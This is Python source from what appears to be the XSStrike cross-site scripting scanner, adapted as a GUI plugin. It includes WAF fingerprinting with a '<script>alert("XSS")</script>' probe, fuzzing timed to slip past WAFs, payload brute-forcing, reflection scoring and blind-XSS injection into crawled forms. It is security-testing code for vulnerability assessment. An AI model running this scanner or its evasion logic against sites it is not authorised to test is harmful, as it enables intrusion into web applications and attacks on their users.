def bruteforcer(target, paramData, payloadList, encoding, headers, delay, timeout):
    GET, POST = (False, True) if paramData else (True, False)
    host = urlparse(target).netloc  # extract the host from the url
    logger.debug('Parsed host to bruteforce: {}'.format(host))
    url = getUrl(target, GET)
    logger.debug('Parsed url to bruteforce: {}'.format(url))
    params = getParams(target, paramData, GET)
    logger.debug_json('Bruteforcer params:', params)
    if not params:
        logger.error('No parameters to test.')
        quit()
    for paramName in params.keys():
        progress = 1
        paramsCopy = copy.deepcopy(params)
        for payload in payloadList:
            logger.run('Bruteforcing %s[%s%s%s]%s: %i/%i\r' %
                       (green, end, paramName, green, end, progress, len(payloadList)))
            if encoding:
                payload = encoding(unquote(payload))
            paramsCopy[paramName] = payload
            response = requester(url, paramsCopy, headers, GET, delay, timeout).text
            if encoding:
                payload = encoding(payload)
            if payload in response:
                logger.info('%s %s' % (good, payload))
            progress += 1
        logger.no_format('')
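# A minimal usage sketch for bruteforcer(), assuming a hypothetical wordlist
# file and target; payloadList is any iterable of payload strings and
# encoding is either None or a callable encoder. Not part of the original
# module, shown only for illustration:
#
#     with open('payloads.txt') as wordlist:                  # hypothetical file
#         payloadList = [line.strip() for line in wordlist if line.strip()]
#     bruteforcer('http://example.com/search?q=query', '',    # empty paramData -> GET
#                 payloadList, None, {'User-Agent': 'XSStrike'}, 0, 10)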
def singleFuzz(target, paramData, encoding, headers, delay, timeout):
    GET, POST = (False, True) if paramData else (True, False)
    # If the user hasn't supplied the root url with http(s), we will handle it
    if not target.startswith('http'):
        try:
            response = requester('https://' + target, {}, headers, GET, delay, timeout)
            target = 'https://' + target
        except Exception:
            target = 'http://' + target
    logger.debug('Single fuzz target: {}'.format(target))
    host = urlparse(target).netloc  # extract the host from the url
    logger.debug('Single fuzz host: {}'.format(host))
    url = getUrl(target, GET)
    logger.debug('Single fuzz url: {}'.format(url))
    params = getParams(target, paramData, GET)
    logger.debug_json('Single fuzz params:', params)
    if not params:
        logger.error('No parameters to test.')
        quit()
    WAF = wafDetector(url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout)
    if WAF:
        logger.error('WAF detected: %s%s%s' % (green, WAF, end))
    else:
        logger.good('WAF Status: %sOffline%s' % (green, end))
    for paramName in params.keys():
        logger.info('Fuzzing parameter: %s' % paramName)
        paramsCopy = copy.deepcopy(params)
        paramsCopy[paramName] = xsschecker
        fuzzer(url, paramsCopy, headers, GET, delay, timeout, WAF, encoding)
def fuzzer(url, params, headers, GET, delay, timeout, WAF, encoding):
    for fuzz in fuzzes:
        # wait longer for noisier payloads so the WAF is less likely to trip
        t = delay + randint(delay, delay * 2) + counter(fuzz)
        sleep(t)
        try:
            if encoding:
                fuzz = encoding(unquote(fuzz))
            data = replaceValue(params, xsschecker, fuzz, copy.deepcopy)
            response = requester(url, data, headers, GET, delay / 2, timeout)
        except Exception:
            logger.error('WAF is dropping suspicious requests.')
            if delay == 0:
                logger.info('Delay has been increased to %s6%s seconds.' % (green, end))
                delay += 6
            wait = (delay + 1) * 50
            for remaining in range(wait, 0, -1):
                logger.info('\rFuzzing will continue after %s%i%s seconds.\t\t\r' %
                            (green, remaining, end))
                sleep(1)
            try:
                requester(url, params, headers, GET, 0, 10)
                logger.good('Pheww! Looks like sleeping for %s%i%s seconds worked!' %
                            (green, wait, end))
            except Exception:
                logger.error('\nLooks like WAF has blocked our IP Address. Sorry!')
                break
            continue  # no response to inspect for this fuzz string; move on
        if encoding:
            fuzz = encoding(fuzz)
        if fuzz.lower() in response.text.lower():  # fuzz string is reflected in the response
            result = ('%s[passed] %s' % (green, end))
        elif str(response.status_code)[:1] != '2':  # the server returned an error (maybe the WAF blocked it)
            result = ('%s[blocked] %s' % (red, end))
        else:  # the fuzz string was not reflected completely in the response
            result = ('%s[filtered]%s' % (yellow, end))
        logger.info('%s %s' % (result, fuzz))
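# The back-off above adds counter(fuzz) to the sleep time. counter() is not
# defined in this file; it is assumed (from XSStrike's utils) to count the
# non-alphanumeric, non-whitespace characters of the payload, so noisier fuzz
# strings wait longer. A minimal sketch under that assumption:
#
#     def counter(string):
#         # strip whitespace and word characters, count what's left
#         return len(re.sub(r'\s|\w', '', string))
#
#     counter('<svg onload=alert()>')  # -> 5 ('<', '=', '(', ')', '>')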
def checky(param, paraNames, url, headers, GET, delay, timeout):
    if param not in paraNames:
        logger.debug('Checking param: {}'.format(param))
        response = requester(url, {param: xsschecker}, headers, GET, delay, timeout).text
        # the canary only counts when it comes back as a delimited value
        if '\'%s\'' % xsschecker in response or '"%s"' % xsschecker in response or ' %s ' % xsschecker in response:
            paraNames[param] = ''
            logger.good('Valid parameter found: %s%s%s' % (green, param, end))
def rec(target):
    # relies on variables from the enclosing crawler scope (processed, forms,
    # storage, headers, delay, timeout, signal, skipDOM, main_url, host, schema)
    processed.add(target)
    printableTarget = '/'.join(target.split('/')[3:])
    if len(printableTarget) > 40:
        printableTarget = printableTarget[-40:]
    else:
        printableTarget = (printableTarget + (' ' * (40 - len(printableTarget))))
    logger.run('Parsing %s\r' % printableTarget)
    url = getUrl(target, True)
    params = getParams(target, '', True)
    if '=' in target:  # if there's a '=' in the url, there should be GET parameters
        inps = []
        for name, value in params.items():
            inps.append({'name': name, 'value': value})
        forms.append({0: {'action': url, 'method': 'get', 'inputs': inps}})
    response = requester(url, params, headers, True, delay, timeout, signal=signal).text
    retireJs(url, response)
    if not skipDOM:
        highlighted = dom(response)
        clean_highlighted = ''.join(
            [re.sub(r'^\d+\s+', '', line) for line in highlighted])
        if highlighted and clean_highlighted not in checkedDOMs:
            checkedDOMs.append(clean_highlighted)
            logger.good('Potentially vulnerable objects found at %s' % url)
            logger.red_line(level='good')
            for line in highlighted:
                logger.no_format(line, level='good')
            logger.red_line(level='good')
    forms.append(zetanize(response))
    matches = re.findall(r'<[aA].*href=["\']{0,1}(.*?)["\']', response)
    for link in matches:  # iterate over the matches
        # remove everything after a "#" to deal with in-page anchors
        link = link.split('#')[0]
        if link.endswith(('.pdf', '.png', '.jpg', '.jpeg', '.xls', '.xml', '.docx', '.doc')):
            continue  # skip links to static documents and images
        if link[:4] == 'http':
            if link.startswith(main_url):
                storage.add(link)
        elif link[:2] == '//':
            if link.split('/')[2].startswith(host):
                storage.add(schema + link)
        elif link[:1] == '/':
            storage.add(main_url + link)
        else:
            storage.add(main_url + '/' + link)
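# Behaviour of the href-extraction regex above, on a made-up snippet:
#
#     sample = '<a class="nav" href="/about">About</a><a href="/contact">C</a>'
#     re.findall(r'<[aA].*href=["\']{0,1}(.*?)["\']', sample)  # -> ['/contact']
#
# Because '.*' is greedy, two anchors on one line collapse into a single
# match for the last href, so links can be missed on minified pages.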
def wafDetector(url, params, headers, GET, delay, timeout):
    with open(sys.path[0] + '/plugins/XSStrike/db/wafSignatures.json', 'r') as file:
        wafSignatures = json.load(file)
    # a payload which is noisy enough to provoke the WAF
    noise = '<script>alert("XSS")</script>'
    params['xss'] = noise
    # send the noise-injected request and record what came back
    response = requester(url, params, headers, GET, delay, timeout)
    page = response.text
    code = str(response.status_code)
    headers = str(response.headers)
    logger.debug('Waf Detector code: {}'.format(code))
    logger.debug_json('Waf Detector headers:', response.headers)
    if int(code) < 400:
        return None
    bestMatch = [0, None]
    for wafName, wafSignature in wafSignatures.items():
        score = 0
        pageSign = wafSignature['page']
        codeSign = wafSignature['code']
        headersSign = wafSignature['headers']
        if pageSign and re.search(pageSign, page, re.I):
            score += 1
        if codeSign and re.search(codeSign, code, re.I):
            # http codes aren't strong indicators, so they count for less
            score += 0.5
        if headersSign and re.search(headersSign, headers, re.I):
            score += 1
        # keep whichever signature scores highest
        if score > bestMatch[0]:
            bestMatch = [score, wafName]
    if bestMatch[0] != 0:
        return bestMatch[1]
    return None
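# wafDetector() expects db/wafSignatures.json to map WAF names to three
# optional regexes. An illustrative (made-up) entry showing the expected shape:
#
#     {
#         "Example WAF": {
#             "page":    "access denied|blocked by example",
#             "code":    "403",
#             "headers": "x-example-waf"
#         }
#     }
#
# 'page' and 'headers' matches add 1 to a signature's score, a 'code' match
# adds only 0.5, and the highest-scoring signature wins.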
def checker(url, params, headers, GET, delay, payload, positions, timeout, encoding):
    checkString = 'st4r7s' + payload + '3nd'
    if encoding:
        checkString = encoding(unquote(checkString))
    response = requester(url,
                         replaceValue(params, xsschecker, checkString, copy.deepcopy),
                         headers, GET, delay, timeout).text.lower()
    reflectedPositions = []
    for match in re.finditer('st4r7s', response):
        reflectedPositions.append(match.start())
    filledPositions = fillHoles(positions, reflectedPositions)
    # iterating over the reflections
    num = 0
    efficiencies = []
    for position in filledPositions:
        allEfficiencies = []
        try:
            reflected = response[reflectedPositions[num]:reflectedPositions[num] + len(checkString)]
            efficiency = fuzz.partial_ratio(reflected, checkString.lower())
            allEfficiencies.append(efficiency)
        except IndexError:
            pass
        if position:
            reflected = response[position:position + len(checkString)]
            if encoding:
                checkString = encoding(checkString.lower())
            efficiency = fuzz.partial_ratio(reflected, checkString)
            if reflected[:-2] == ('\\%s' % checkString.replace('st4r7s', '').replace('3nd', '')):
                efficiency = 90
            allEfficiencies.append(efficiency)
            efficiencies.append(max(allEfficiencies))
        else:
            efficiencies.append(0)
        num += 1
    return list(filter(None, efficiencies))
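# The efficiency is a fuzzy-match score between what was sent and what came
# back, computed with fuzz.partial_ratio (fuzzywuzzy/thefuzz). A small
# illustration; only the 100 case is exact, the second value is indicative:
#
#     from fuzzywuzzy import fuzz
#     fuzz.partial_ratio('st4r7s<b>3nd', 'st4r7s<b>3nd')  # 100: intact reflection
#     fuzz.partial_ratio('st4r7sb3nd', 'st4r7s<b>3nd')    # < 100: tags stripped
#
# An efficiency of 100 therefore means the marked payload was reflected
# unmodified, which the caller treats as a likely working vector.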
def retireJs(url, response):
    scripts = js_extractor(response)
    for script in scripts:
        if script not in getVar('checkedScripts'):
            updateVar('checkedScripts', script, 'add')
            uri = handle_anchor(url, script)
            response = requester(uri, '', getVar('headers'), True,
                                 getVar('delay'), getVar('timeout')).text
            result = main_scanner(uri, response)
            if result:
                logger.red_line()
                logger.good('Vulnerable component: ' + result['component'] + ' v' + result['version'])
                logger.info('Component location: %s' % uri)
                details = result['vulnerabilities']
                logger.info('Total vulnerabilities: %i' % len(details))
                for detail in details:
                    logger.info('%sSummary:%s %s' % (green, end, detail['identifiers']['summary']))
                    logger.info('Severity: %s' % detail['severity'])
                    logger.info('CVE: %s' % detail['identifiers']['CVE'][0])
                logger.red_line()
def arjun(url, GET, headers, delay, timeout):
    paraNames = {}
    response = requester(url, {}, headers, GET, delay, timeout).text
    matches = re.findall(r'<input.*?name=\'(.*?)\'.*?>|<input.*?name="(.*?)".*?>', response)
    for match in matches:
        # each match is a (single-quoted, double-quoted) tuple; only one group is filled
        foundParam = match[0] or match[1]
        if not foundParam:
            continue
        logger.good('Heuristics found a potentially valid parameter: %s%s%s. Prioritizing it.' %
                    (green, foundParam, end))
        if foundParam not in blindParams:
            blindParams.insert(0, foundParam)
    threadpool = concurrent.futures.ThreadPoolExecutor(max_workers=threadCount)
    futures = (threadpool.submit(checky, param, paraNames, url, headers, GET, delay, timeout)
               for param in blindParams)
    for i, _ in enumerate(concurrent.futures.as_completed(futures)):
        if i + 1 == len(blindParams) or (i + 1) % threadCount == 0:
            logger.info('Progress: %i/%i\r' % (i + 1, len(blindParams)))
    return paraNames
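# The alternation in the <input> regex yields 2-tuples, which is why
# foundParam takes whichever group is non-empty. For example:
#
#     re.findall(r'<input.*?name=\'(.*?)\'.*?>|<input.*?name="(.*?)".*?>',
#                '<input type="text" name="q">')
#     # -> [('', 'q')]  (double-quoted names land in the second slot)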
def scan(payload_signal, signal, target, paramData, encoding, headers, delay, timeout, skipDOM, find, skip):
    GET, POST = (False, True) if paramData else (True, False)
    # If the user hasn't supplied the root url with http(s), we will handle it
    if not target.startswith('http'):
        try:
            response = requester('https://' + target, {}, headers, GET, delay, timeout)
            target = 'https://' + target
        except Exception:
            target = 'http://' + target
    logger.debug('Scan target: {}'.format(target))
    response = requester(target, {}, headers, GET, delay, timeout).text
    if not skipDOM:
        logger.run('Checking for DOM vulnerabilities')
        signal[str, str].emit('[+] Checking for DOM XSS', 'green')
        highlighted = dom(response)
        if highlighted:
            logger.good('Potentially vulnerable objects found')
            signal[str, str].emit('[+] DOM XSS found', 'red')
            logger.red_line(level='good')
            for line in highlighted:
                logger.no_format(line, level='good')
                signal[str, str].emit('[+] %s' % line, 'red')
            logger.red_line(level='good')
    host = urlparse(target).netloc  # extract the host from the url
    logger.debug('Host to scan: {}'.format(host))
    url = getUrl(target, GET)
    logger.debug('Url to scan: {}'.format(url))
    params = getParams(target, paramData, GET)
    logger.debug_json('Scan parameters:', params)
    if find:
        params = arjun(url, GET, headers, delay, timeout)
    if not params:
        logger.error('No parameters to test.')
        quit()
    WAF = wafDetector(url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout)
    if WAF:
        # logger.error('WAF detected: %s%s%s' % (green, WAF, end))
        signal[str, str].emit('[+] WAF status: protected -> %s' % WAF, 'red')
    else:
        # logger.good('WAF Status: %sOffline%s' % (green, end))
        signal[str, str].emit('[+] WAF status: offline', 'red')
    for paramName in params.keys():
        paramsCopy = copy.deepcopy(params)
        # logger.info('Testing parameter: %s' % paramName)
        signal[str, str].emit('[+] Testing parameter: %s' % paramName, 'green')
        if encoding:
            paramsCopy[paramName] = encoding(xsschecker)
        else:
            paramsCopy[paramName] = xsschecker
        response = requester(url, paramsCopy, headers, GET, delay, timeout)
        occurences = htmlParser(response, encoding)
        positions = occurences.keys()
        logger.debug('Scan occurences: {}'.format(occurences))
        if not occurences:
            # logger.error('No reflection found')
            signal[str, str].emit('[-] No reflection found', 'green')
            continue
        else:
            # logger.info('Reflections found: %i' % len(occurences))
            signal[str, str].emit('[+] Reflections found: %i' % len(occurences), 'red')
        logger.run('Analysing reflections')
        signal[str, str].emit('[+] Analysing reflections', 'green')
        efficiencies = filterChecker(url, paramsCopy, headers, GET, delay, occurences, timeout, encoding)
        logger.debug('Scan efficiencies: {}'.format(efficiencies))
        # logger.run('Generating payloads')
        signal[str, str].emit('[+] Generating payloads', 'green')
        vectors = generator(occurences, response.text)
        total = 0
        for v in vectors.values():
            total += len(v)
        if total == 0:
            logger.error('No vectors were crafted.')
            continue
        logger.info('Payloads generated: %i' % total)
        signal[str, str].emit('[+] Payloads generated: %i' % total, 'green')
        progress = 0
        for confidence, vects in vectors.items():
            for vect in vects:
                if plugins.XSStrike.core.config.wait == 1:
                    return
                if plugins.XSStrike.core.config.globalVariables['path']:
                    vect = vect.replace('/', '%2F')
                loggerVector = vect
                progress += 1
                logger.run('Progress: %i/%i\r' % (progress, total))
                if not GET:
                    vect = unquote(vect)
                efficiencies = checker(url, paramsCopy, headers, GET, delay, vect, positions, timeout, encoding)
                if not efficiencies:
                    for i in range(len(occurences)):
                        efficiencies.append(0)
                bestEfficiency = max(efficiencies)
                if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95):
                    logger.red_line()
                    signal[str, str].emit('-' * 50, 'red')
                    logger.good('Payload: %s' % loggerVector)
                    payload_signal[str].emit(paramName + ': ' + html.escape(loggerVector))
                    signal[str, str].emit('[+] Payload: %s' % html.escape(loggerVector), 'red')
                    logger.info('Efficiency: %i' % bestEfficiency)
                    signal[str, str].emit('[+] Efficiency: %i' % bestEfficiency, 'red')
                    logger.info('Confidence: %i' % confidence)
                    signal[str, str].emit('[+] Confidence: %i' % confidence, 'red')
                    if not skip:
                        choice = input('%s Would you like to continue scanning? [y/N] ' % que).lower()
                        if choice != 'y':
                            quit()
                elif bestEfficiency > minEfficiency:
                    logger.red_line()
                    signal[str, str].emit('-' * 50, 'red')
                    logger.good('Payload: %s' % loggerVector)
                    payload_signal[str].emit(paramName + ': ' + html.escape(loggerVector))
                    signal[str, str].emit('[+] Payload: %s' % html.escape(loggerVector), 'red')
                    logger.info('Efficiency: %i' % bestEfficiency)
                    signal[str, str].emit('[+] Efficiency: %i' % bestEfficiency, 'red')
                    logger.info('Confidence: %i' % confidence)
                    signal[str, str].emit('[+] Confidence: %i' % confidence, 'red')
        logger.no_format('')
def crawl(scheme, host, main_url, form, blindXSS, blindPayload, headers, delay, timeout, encoding, signal):
    if form:
        for each in form.values():
            url = each['action']
            if url:
                # normalise relative and protocol-relative action urls
                if url.startswith(main_url):
                    pass
                elif url.startswith('//') and url[2:].startswith(host):
                    url = scheme + '://' + url[2:]
                elif url.startswith('/'):
                    url = scheme + '://' + host + url
                elif re.match(r'\w', url[0]):
                    url = scheme + '://' + host + '/' + url
                if url not in plugins.XSStrike.core.config.globalVariables['checkedForms']:
                    plugins.XSStrike.core.config.globalVariables['checkedForms'][url] = []
                method = each['method']
                GET = True if method == 'get' else False
                inputs = each['inputs']
                paramData = {}
                for one in inputs:
                    paramData[one['name']] = one['value']
                for paramName in paramData.keys():
                    if paramName not in plugins.XSStrike.core.config.globalVariables['checkedForms'][url]:
                        plugins.XSStrike.core.config.globalVariables['checkedForms'][url].append(paramName)
                        paramsCopy = copy.deepcopy(paramData)
                        paramsCopy[paramName] = xsschecker
                        response = requester(url, paramsCopy, headers, GET, delay, timeout)
                        occurences = htmlParser(response, encoding)
                        positions = occurences.keys()
                        efficiencies = filterChecker(url, paramsCopy, headers, GET,
                                                     delay, occurences, timeout, encoding)
                        vectors = generator(occurences, response.text)
                        if vectors:
                            for confidence, vects in vectors.items():
                                try:
                                    payload = list(vects)[0]
                                    logger.vuln('Vulnerable webpage: %s%s%s' % (green, url, end))
                                    logger.vuln('Vector for %s%s%s: %s' % (green, paramName, end, payload))
                                    signal[str, str].emit('[+] Vulnerable webpage found: %s' % url, 'red')
                                    signal[str, str].emit('[+] Vector: %s : %s' %
                                                          (paramName, html.escape(payload)), 'red')
                                    break
                                except IndexError:
                                    pass
                        if blindXSS and blindPayload:
                            paramsCopy[paramName] = blindPayload
                            requester(url, paramsCopy, headers, GET, delay, timeout)
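# crawl() consumes the form dict shape built by rec()/zetanize(); an
# illustrative example of one entry (values are made up):
#
#     {0: {'action': 'https://example.com/search',
#          'method': 'get',
#          'inputs': [{'name': 'q', 'value': 'test'}]}}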